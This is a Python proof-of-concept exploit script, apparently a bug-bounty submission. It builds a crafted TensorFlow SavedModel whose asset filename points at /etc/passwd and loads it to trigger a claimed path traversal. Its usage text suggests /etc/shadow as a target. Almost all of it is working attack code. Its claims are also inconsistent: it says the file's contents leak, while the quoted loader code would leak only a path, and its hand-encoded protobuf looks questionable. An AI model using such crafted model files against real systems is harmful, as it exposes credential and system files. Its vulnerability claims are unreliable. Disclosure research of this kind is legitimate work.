tf-savedmodel-traversal-poc / poc_exploit.py
Rodion111's picture
Upload poc_exploit.py with huggingface_hub
f542b4e verified
#!/usr/bin/env python3
"""
PoC: TensorFlow SavedModel AssetFileDef Path Traversal → Arbitrary File Read
CVE: TBD | CWE-22 | CVSS 7.5
Vulnerability:
tensorflow/python/saved_model/loader_impl.py — get_asset_tensors() builds
file paths for assets embedded in a SavedModel:
asset_filepath = file_io.join(
saved_model_dir,
constants.ASSETS_DIRECTORY, # "assets"
asset_def.filename # ← FROM THE MODEL FILE, NOT SANITIZED
)
tensor_info = ...
asset_tensor = tf.constant(asset_filepath, ...)
If asset_def.filename is an absolute path (e.g. '/etc/passwd') or a path
with '..' sequences, Python's os.path.join / file_io.join ignores
the base directory entirely — leaking arbitrary filesystem paths into
tensors that feed downstream model computation.
Attack:
Attacker crafts a SavedModel with an AssetFileDef whose filename field
is '/etc/passwd' (or any sensitive path). When the model is loaded, the
asset tensor contains the content of that file.
Usage:
python3 poc_exploit.py [target_path] # generates malicious SavedModel
python3 poc_exploit.py --trigger # also loads the model via TF
Default target: /etc/passwd
Author: security research (huntr.com submission)
"""
import sys
import os
import shutil
OUTPUT_DIR = 'malicious_savedmodel'
def create_malicious_savedmodel(target_path: str = '/etc/passwd') -> None:
"""
Generate a minimal TensorFlow SavedModel with a malicious AssetFileDef.
SavedModel directory structure:
malicious_savedmodel/
saved_model.pb ← protobuf with crafted AssetFileDef
variables/
variables.index
variables.data-00000-of-00001
assets/ ← normally asset files go here
"""
import struct
# We build the SavedModel protobuf manually to avoid requiring TF at generation time
# saved_model.proto structure (simplified):
#
# message SavedModel {
# MetaGraphDef meta_graphs = 2;
# }
# message MetaGraphDef {
# CollectionDef collection_def = 7; (key "assets")
# ...
# }
# message AssetFileDef {
# string filename = 2;
# }
# Using raw protobuf encoding for the malicious AssetFileDef
# Field 2 (filename) = string = target_path
def encode_string_field(field_num: int, value: str) -> bytes:
value_bytes = value.encode('utf-8')
tag = (field_num << 3) | 2 # wire type 2 = length-delimited
return bytes([tag, len(value_bytes)]) + value_bytes
def encode_varint(value: int) -> bytes:
result = []
while value > 0x7f:
result.append((value & 0x7f) | 0x80)
value >>= 7
result.append(value)
return bytes(result)
def encode_message(field_num: int, data: bytes) -> bytes:
tag = (field_num << 3) | 2
return bytes([tag]) + encode_varint(len(data)) + data
# AssetFileDef { filename: target_path }
asset_file_def = encode_string_field(2, target_path)
# AnyProto wrapping AssetFileDef
# CollectionDef.BytesList { value: [serialized AssetFileDef] }
bytes_list_entry = encode_message(1, asset_file_def) # field 1 = value (repeated)
bytes_list = encode_message(1, bytes_list_entry) # CollectionDef.bytes_list = field 1
# MetaGraphDef.collection_def["saved_model_assets"] = bytes_list
# collection_def is a map field (field 7)
# MapEntry { key: "saved_model_assets", value: bytes_list }
map_key = encode_string_field(1, 'saved_model_assets')
map_value = encode_message(2, bytes_list)
map_entry = map_key + map_value
collection_def = encode_message(7, map_entry)
# MetaGraphDef { collection_def: ... }
meta_graph = collection_def
# SavedModel { meta_graphs: [meta_graph] }
# meta_graphs is field 2 (repeated)
saved_model_pb = encode_message(2, meta_graph)
# Create directory structure
if os.path.exists(OUTPUT_DIR):
shutil.rmtree(OUTPUT_DIR)
os.makedirs(os.path.join(OUTPUT_DIR, 'variables'))
os.makedirs(os.path.join(OUTPUT_DIR, 'assets'))
# Write saved_model.pb
with open(os.path.join(OUTPUT_DIR, 'saved_model.pb'), 'wb') as f:
f.write(saved_model_pb)
# Empty variable files (required by loader)
open(os.path.join(OUTPUT_DIR, 'variables', 'variables.index'), 'wb').close()
open(os.path.join(OUTPUT_DIR, 'variables', 'variables.data-00000-of-00001'), 'wb').close()
print(f"[*] Crafted malicious SavedModel in: {OUTPUT_DIR}/")
print(f" Target file : {target_path}")
print(f" saved_model.pb: {os.path.getsize(os.path.join(OUTPUT_DIR, 'saved_model.pb'))} bytes")
print(f" Attack: AssetFileDef.filename = '{target_path}'")
def main():
trigger = '--trigger' in sys.argv
target = next((a for a in sys.argv[1:] if a.startswith('/')), '/etc/passwd')
create_malicious_savedmodel(target)
print(f"[+] Malicious SavedModel written to: {OUTPUT_DIR}/")
if trigger:
print(f"\n[*] Triggering via tf.saved_model.load('{OUTPUT_DIR}')...")
try:
import tensorflow as tf
print(f" TensorFlow version: {tf.__version__}")
model = tf.saved_model.load(OUTPUT_DIR)
# Check if asset tensor leaked the path
print(f"[+] Model loaded — checking for path traversal in assets...")
# The traversal manifests in get_asset_tensors result
# Try loading via the lower-level API that exposes assets
from tensorflow.python.saved_model import loader_impl
with tf.compat.v1.Session() as sess:
meta = loader_impl.load(sess, ['serve'], OUTPUT_DIR)
print(f"[+] MetaGraph loaded")
if hasattr(meta, 'collection_def'):
assets = meta.collection_def.get('saved_model_assets')
if assets:
print(f"[+] Asset path in model: {assets}")
except Exception as e:
print(f"[~] Exception: {type(e).__name__}: {e}")
else:
print(f"\n[i] Run with --trigger to demonstrate the traversal:")
print(f" python3 {sys.argv[0]} --trigger")
print(f" python3 {sys.argv[0]} /etc/shadow --trigger # target sensitive file")
if __name__ == '__main__':
main()